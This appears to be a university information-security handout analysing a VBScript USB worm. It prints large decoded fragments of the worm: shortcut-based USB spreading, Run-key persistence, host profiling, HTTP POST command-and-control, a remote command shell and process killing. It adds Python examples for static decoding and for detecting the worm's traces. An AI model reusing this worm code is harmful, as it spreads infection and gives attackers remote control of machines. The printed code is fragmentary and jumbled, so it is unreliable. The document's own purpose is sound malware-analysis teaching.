Information Security
Prof. Marcelo Ferreira Zochio
Student:
Student ID (RA):
Date:
I. Objective
II. Description
A worm is a program similar to a virus, with the difference that it is
self-replicating: it creates functional copies of itself and infects other
computers. The infection can spread through local network connections, the
Internet, email attachments and USB media.
III. Procedures
Exit Function
End If
nGroup = 64 * nGroup + thisData
Next
nGroup = Hex(nGroup)
nGroup = String(6 - Len(nGroup), "0") & nGroup
Next
decodeBase64 = sOut
End Function
There is more detail to this encoding, but it will be covered at another time.
Decoding the Base64 text above, the first round yielded:
Next
decodeBase64 = sOut
End Function
Running a third round to decode the new Base64 code yielded:
In the fourth round:
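The fourth round produced an assignment to a variable named `HOUDINI` whose value is a string of `|`-separated decimal character codes, nested inside the earlier Base64 rounds. The Python below is an added example, not part of the original handout or of the analysed sample: it unwraps that kind of nesting statically, decoding text only and never running a script. The wrapper lines and the inert payload in `SAMPLE` are constructed for the example.

```python
import base64
import binascii
import re

QUOTED = re.compile(r'"([^"]{16,})"')               # long string literals
B64 = re.compile(r"[A-Za-z0-9+/]+={0,2}")
DECIMALS = re.compile(r"\d{1,3}(?:\|\d{1,3}){7,}")  # 39|60|32|45|...


def from_base64(s):
    """Return the decoded text if s is one Base64 blob of printable text."""
    s = s.replace("\r", "").replace("\n", "").strip()
    if len(s) % 4 or not B64.fullmatch(s):
        return None
    try:
        out = base64.b64decode(s, validate=True).decode("latin-1")
    except binascii.Error:
        return None
    printable = sum(c.isprintable() or c in "\r\n\t" for c in out)
    return out if printable >= 0.95 * len(out) else None


def from_decimals(s):
    """Return the text spelled by a '|'-separated list of character codes."""
    s = "".join(s.split())
    if not DECIMALS.fullmatch(s):
        return None
    codes = [int(n) for n in s.split("|")]
    return "".join(map(chr, codes)) if max(codes) < 256 else None


def peel(text, max_layers=32):
    """Unwrap nested layers statically; returns (innermost_text, layer_kinds)."""
    kinds = []
    for _ in range(max_layers):
        # Try the longest quoted literal first, then the text as a whole.
        literals = sorted(QUOTED.findall(text), key=len, reverse=True)
        for candidate in literals[:1] + [text]:
            decoded, kind = from_decimals(candidate), "decimal"
            if decoded is None:
                decoded, kind = from_base64(candidate), "base64"
            if decoded is not None:
                break
        else:
            return text, kinds          # nothing left to decode
        text, kinds = decoded, kinds + [kind]
    return text, kinds


def build_sample(inner):
    """Constructed test input: wrap inner in Base64 and decimal layers."""
    def b64(t):
        return base64.b64encode(t.encode("latin-1")).decode("ascii")
    stage = 'x = decodeBase64("' + b64(inner) + '")'
    stage = 'HOUDINI = "' + "|".join(str(ord(c)) for c in stage) + '"'
    return 'y = decodeBase64("' + b64(b64(stage)) + '")'


INERT = "' constructed inert payload\r\nWScript.Echo 1"  # harmless stand-in
SAMPLE = build_sample(INERT)

if __name__ == "__main__":
    final, kinds = peel(SAMPLE)
    print(kinds, repr(final))
```

The `max_layers` bound and the printable-text check keep the loop from running away on input that merely resembles Base64.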
shellobj
shellobj = wscript.createobject("wscript.shell")
filesystemobj
filesystemobj = createobject("scripting.filesystemobject")
httpobj
httpobj = createobject("msxml2.xmlhttp")
installdir
file.attributes = 2+4
if ucase (file.name) <> ucase (installname) then
filename = split(file.name,".")
set lnkobj = shellobj.createshortcut (drive.path & "\"
& filename
lnkobj.windowstyle = 7
lnkobj.targetpath = "cmd.exe"
lnkobj.workingdirectory = ""
lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) &
" " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\"
&
shellobj.regread
("HKEY_LOCAL_MACHINE\software\classes\."
&
split(file.name,
".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
if instr (fileicon,",") = 0 then
lnkobj.iconlocation = file.path
else
lnkobj.iconlocation = fileicon
end if
lnkobj.save()
end if
end if
end if
next
for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
if not lnkfolder then exit for
folder.attributes = 2+4
foldername = folder.name
set lnkobj = shellobj.createshortcut (drive.path & "\" & foldername & ".lnk")
lnkobj.windowstyle = 7
lnkobj.targetpath = "cmd.exe"
lnkobj.workingdirectory = ""
lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " &
chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34))
&"&exit"
foldericon
=
shellobj.regread
("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
if instr (foldericon,",") = 0 then
lnkobj.iconlocation = folder.path
else
lnkobj.iconlocation = foldericon
end if
lnkobj.save()
next
end If
end If
end if
next
err.clear
end sub
sub uninstall
on error resume next
dim filename
dim foldername
shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" &
split (installname,".")(0)
shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" &
split (installname,".")(0)
filesystemobj.deletefile startup & installname ,true
filesystemobj.deletefile wscript.scriptfullname ,true
for each drive in filesystemobj.drives
if drive.isready = true then
if drive.freespace > 0 then
if drive.drivetype = 1 then
for each file in filesystemobj.getfolder ( drive.path & "\").files
on error resume next
if instr (file.name,".") then
then
file.attributes = 0
if ucase (file.name) <> ucase (installname) then
filename = split(file.name,".")
filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
else
filesystemobj.deletefile (drive.path & "\" & file.name)
end If
else
filesystemobj.deletefile (file.path)
end if
end if
next
for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
folder.attributes = 0
next
end if
end if
end if
next
wscript.quit
end sub
function post (cmd ,param)
post = param
httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
httpobj.setrequestheader "user-agent:",information
httpobj.send param
post = httpobj.responsetext
end function
function information
on error resume next
if inf = "" then
inf = hwid & spliter
inf = inf & shellobj.expandenvironmentstrings("%computername%") & spliter
inf = inf & shellobj.expandenvironmentstrings("%username%") & spliter
set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set os = root.execquery ("select * from win32_operatingsystem")
for each osinfo in os
inf = inf & osinfo.caption & spliter
exit for
next
inf = inf & "plus" & spliter
inf = inf & security & spliter
inf = inf & usbspreading
information = inf
else
information = inf
end if
end function
sub upstart ()
on error resume Next
shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\"
split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname
chrw(34) , "REG_SZ"
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\"
split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname
chrw(34) , "REG_SZ"
filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true
&
&
&
&
end sub
function hwid
on error resume next
set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set disks = root.execquery ("select * from win32_logicaldisk")
upstart
set scriptfullnameshort = filesystemobj.getfile (wscript.scriptfullname)
set installfullnameshort = filesystemobj.getfile (installdir & installname)
if lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
wscript.quit
end If
err.clear
set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
if err.number > 0 then wscript.quit
end function
sub sitedownloader (fileurl,filename)
strlink = fileurl
strsaveto = installdir & filename
set objhttpdownload = createobject("msxml2.xmlhttp" )
function enumdriver ()
for
if
&
"|"
&
"f"
&
"|"
&
next
end function
function enumprocess ()
on error resume next
set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_process",,48)
dim objitem
for each objitem in colitems
enumprocess = enumprocess & objitem.name & "|"
enumprocess = enumprocess & objitem.processid & "|"
enumprocess = enumprocess & objitem.executablepath & spliter
next
end function
sub exitprocess (pid)
on error resume next
shellobj.run "taskkill /F /T /PID " & pid,7,true
end sub
sub deletefaf (url)
on error resume next
filesystemobj.deletefile url
filesystemobj.deletefolder url
end sub
function cmdshell (cmd)
dim httpobj,oexec,readallfromany
set oexec = shellobj.exec ("%comspec% /c " & cmd)
if not oexec.stdout.atendofstream then
readallfromany = oexec.stdout.readall
elseif not oexec.stderr.atendofstream then
readallfromany = oexec.stderr.readall
else
readallfromany = ""
end if
cmdshell = readallfromany
end function
lcase(fn) then
Err.Clear
fs.CopyFile wscript.scriptfullname,dr & fn ,true
set fh = fs.OpenTextFile( dr & fn, 8, false)
if Err.Number>0 then
wscript.quit
end if
xins
end function
sub xins
on error resume next
sh.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\" & fn, chrw(34) & dr
& fn & chrw(34), "REG_SZ"
sh.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\" & fn, chrw(34) & dr
& fn & chrw(34), "REG_SZ"
fs.copyfile
wscript.scriptfullname,
CreateObject("Shell.Application").NameSpace(&H7).Self.Path &"\" & fn ,true
for each xx in fs.Drives
if xx.isready then
if xx.FreeSpace >0 then
' Removable drive
if xx.drivetype=1 then
if fs.fileexists(xx.path & "\" & fn) then
fs.getfile(xx.path & "\" & fn).Attributes=0
end if
fs.copyfile dr & fn , xx.path & "\" & fn,true
For Each x In fs.GetFolder( xx.path & "\" ).Files
wscript.sleep 1
if instr(x.name,".") then
if lcase( Split(x.name, ".")(UBound(Split(x.name, "."))))<>"lnk" then
x.Attributes = 2
if ucase(x.name) <> ucase(fn) then
With sh.CreateShortcut(xx.path & "\" & x.name & ".lnk")
.TargetPath = "cmd.exe"
.WorkingDirectory = ""
.Arguments = "/c start " & Replace(fn," ", ChrW(34) _
& " " & ChrW(34)) & "&start " & replace( x.name," ", ChrW(34) & " " & ChrW(34)) & " &
exit"
.IconLocation
=
sh.regread("HKLM\SOFTWARE\Classes\"
&
sh.regread("HKLM\SOFTWARE\Classes\." & Split(x.name, ".")(UBound(Split(x.name, "."))) &
"\") & "\DefaultIcon\")
if instr( .iconlocation,",")=0 then
.iconlocation = .iconlocation &",0"
end if
.Save()
end with
end if
end if
end if
Next
&"\"
&
fn
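The decoded script leaves two artefacts a defender can check for: Run-key data that autostarts a script (`wscript.exe //B "<path>"` or a bare quoted script path), and `.lnk` files on removable drives whose target is `cmd.exe` with `/c start <script>&start <original>&exit` arguments beside hidden originals. The Python below is an added example, not code from the handout or the sample, that tests for both. It assumes the shortcut fields and file attributes were already extracted by another tool; the drive listing and paths are constructed.

```python
import re

# Shortcut arguments built by the script's USB routine:
#   "/c start <script>&start [explorer ]<original>&exit"
LNK_ARGS = re.compile(
    r"^/c start (?P<script>.+?)&start (?:explorer )?(?P<orig>.+?)\s*&\s*exit$",
    re.IGNORECASE,
)
# Run-key data: 'wscript.exe //B "<path>"' (first variant) or '"<path>"' (second).
RUN_VALUE = re.compile(
    r'^\s*(?:wscript(?:\.exe)?\s+//B\s+)?"(?P<path>[^"]+)"\s*$', re.IGNORECASE
)
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf")
HIDDEN, SYSTEM = 2, 4  # FileSystemObject attribute bits set by the script


def suspicious_run_value(data):
    """Return the script path if a Run value autostarts a WSH script, else None."""
    m = RUN_VALUE.match(data)
    if m and m.group("path").lower().endswith(SCRIPT_EXTS):
        return m.group("path")
    return None


def triage_drive(entries):
    """Flag .lnk files that chain a script to an original on the same drive.

    entries: dicts with 'name', 'attrs' and, for shortcuts, 'target' and
    'args' (hypothetical field names for already-parsed shortcut data).
    """
    attrs = {e["name"].lower(): e["attrs"] for e in entries}
    findings = []
    for e in entries:
        is_lnk = e["name"].lower().endswith(".lnk")
        runs_cmd = e.get("target", "").lower().endswith("cmd.exe")
        m = LNK_ARGS.match(e.get("args", "")) if is_lnk and runs_cmd else None
        if not m:
            continue
        # The script replaces each space with '" "'; undo that for lookups.
        script = m.group("script").replace('" "', " ")
        orig = m.group("orig").replace('" "', " ")
        hidden = bool(attrs.get(orig.lower(), 0) & HIDDEN)
        findings.append({"lnk": e["name"], "script": script,
                         "original": orig, "original_hidden": hidden})
    return findings


# Constructed listing of a removable drive root (not real telemetry).
SAMPLE_DRIVE = [
    {"name": "sample.vbs", "attrs": HIDDEN | SYSTEM},
    {"name": "report.docx", "attrs": HIDDEN | SYSTEM},
    {"name": "report.lnk", "attrs": 0, "target": "cmd.exe",
     "args": "/c start sample.vbs&start report.docx&exit"},
    {"name": "Photos", "attrs": HIDDEN | SYSTEM},
    {"name": "Photos.lnk", "attrs": 0, "target": "cmd.exe",
     "args": "/c start sample.vbs&start explorer Photos&exit"},
    {"name": "tool.lnk", "attrs": 0, "target": "C:\\Tools\\tool.exe", "args": ""},
]

if __name__ == "__main__":
    for finding in triage_drive(SAMPLE_DRIVE):
        print(finding)
    print(suspicious_run_value('wscript.exe //B "C:\\Temp\\sample.vbs"'))
```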